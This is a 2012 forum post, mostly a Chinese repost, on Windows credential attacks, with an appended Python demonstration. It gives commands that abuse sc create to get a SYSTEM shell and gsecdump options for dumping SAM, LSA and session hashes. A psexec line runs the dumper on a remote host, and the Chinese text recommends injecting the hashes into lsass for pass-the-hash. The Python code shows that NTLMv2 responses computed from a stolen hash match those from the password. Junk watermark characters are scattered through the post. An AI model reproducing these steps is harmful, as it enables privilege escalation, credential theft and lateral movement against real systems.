HASH injection attack

Posted 2012-11-6 21:09:29
To get a DOS prompt as NT SYSTEM:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD
8 l2 }( r3 m) J% N/ `$ v
Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LM hashes that can be easily broken with Rainbow Tables.

: g) w0 K. @6 w( m# J4 u# |提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
# X  y) O  f9 u5 m$ M6 K* H3 N原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]& B% f# J1 x+ g7 d0 S/ N- ?

% \3 P5 S. [! o; x6 d我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
/ v; i) H* [1 ~
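As an added example (my code, not from this post nor from the truesec article it quotes), here is the protocol-level reason the quoted "4 characters or 127" claim holds: NTLM challenge-response, shown here in its NTLMv2 form, takes the NT hash as its key, so a client holding only the hash that gsecdump dumps (and that iam injects into lsass) answers a server challenge exactly like a client that knows the password. The user and domain names, the server challenge and the response blob are constructed stand-ins, and MD4 is implemented inline because hashlib's md4 is unavailable on many current OpenSSL 3 builds. The example also computes the MS-Cache (DCC1) value that cachedump recovers, to show why the post rates cached credentials lower: it is salted with the user name and is not the NTLM key, so the server rejects it and it has to be cracked rather than replayed.

```python
"""Pass-the-hash at protocol level: NTLM authentication keys everything off
NTOWFv1 = MD4(UTF-16LE(password)), never the password itself, so a client that
holds only the dumped 16-byte hash produces a response the server accepts.
Pure-Python MD4 is included because hashlib's 'md4' is missing from many
OpenSSL 3 builds. Names, challenge and blob below are constructed sample input."""
import hmac
import os
import struct

_MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 (three rounds of 16 steps over each 512-bit block)."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (  # (mix function, additive constant, message-word order, shift table)
        (F, 0x00000000, tuple(range(16)), (3, 7, 11, 19)),
        (G, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    bit_len = len(data) * 8
    # pad: 0x80, zeros to 56 mod 64, then the 64-bit little-endian bit length
    data += b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", bit_len)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(data), 64):
        X = struct.unpack("<16I", data[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, order, shifts in rounds:
            for i, idx in enumerate(order):
                a = _rotl((a + fn(b, c, d) + X[idx] + k) & _MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers: next step updates D, then C, then B
        a, b, c, d = (a + aa) & _MASK, (b + bb) & _MASK, (c + cc) & _MASK, (d + dd) & _MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: always 16 bytes, whether the password is 4 characters or 127."""
    return md4(password.encode("utf-16-le"))


def dcc1_hash(password: str, username: str) -> bytes:
    """MS-Cache v1 (what cachedump recovers): MD4(NT hash || UTF-16LE(lower(user))).
    Salted with the user name and not the NTLM key, so it must be cracked, not replayed."""
    return md4(nt_hash(password) + username.lower().encode("utf-16-le"))


def ntlmv2_response(nt: bytes, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """MS-NLMP NTLMv2: NTOWFv2 = HMAC-MD5(NT hash, UTF-16LE(upper(user) + domain));
    NtChallengeResponse = HMAC-MD5(NTOWFv2, ServerChallenge || blob) || blob.
    The only secret input is the hash; the cleartext password never appears."""
    v2_key = hmac.new(nt, (user.upper() + domain).encode("utf-16-le"), "md5").digest()
    nt_proof = hmac.new(v2_key, server_challenge + blob, "md5").digest()
    return nt_proof + blob


def server_verifies(stored_nt: bytes, user: str, domain: str, challenge: bytes, response: bytes) -> bool:
    """The SAM/DC side stores only the NT hash too, and recomputes the proof from it."""
    blob = response[16:]
    return hmac.compare_digest(ntlmv2_response(stored_nt, user, domain, challenge, blob), response)


def pass_the_hash_demo(password: str, dumped_hash_hex: str, user: str = "admin", domain: str = "CORP") -> dict:
    """Three clients answer one constructed challenge: one knows the cleartext, one holds only
    the NT hash as a dumper (gsecdump -u) prints it, one holds only the cached (DCC1) value."""
    challenge = os.urandom(8)  # constructed Type 2 ServerChallenge
    blob = (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", 132_000_000_000_000_000)
            + os.urandom(8) + b"\x00" * 4)  # constructed RespType/timestamp/client nonce, no AvPairs
    legit = ntlmv2_response(nt_hash(password), user, domain, challenge, blob)
    pth = ntlmv2_response(bytes.fromhex(dumped_hash_hex), user, domain, challenge, blob)
    cached = ntlmv2_response(dcc1_hash(password, user), user, domain, challenge, blob)
    return {
        "responses_identical": legit == pth,
        "server_accepts_pth": server_verifies(nt_hash(password), user, domain, challenge, pth),
        "server_accepts_cached_cred": server_verifies(nt_hash(password), user, domain, challenge, cached),
    }


if __name__ == "__main__":
    print(nt_hash("password").hex())  # 8846f7eaee8fb117ad06bdd830b7586c
    print(pass_the_hash_demo("password", "8846f7eaee8fb117ad06bdd830b7586c"))
```

Two caveats on the sc create trick quoted above, for anyone reproducing it: the 1053 error is expected, since cmd.exe never reports back to the Service Control Manager, but the interactive window has already been spawned by the time the timeout fires; and type= interact only puts that window on the console user's desktop on Windows XP/2003, where services and the console session share session 0. On Vista and later, session 0 isolation means the SYSTEM shell is spawned but does not appear on the user's desktop.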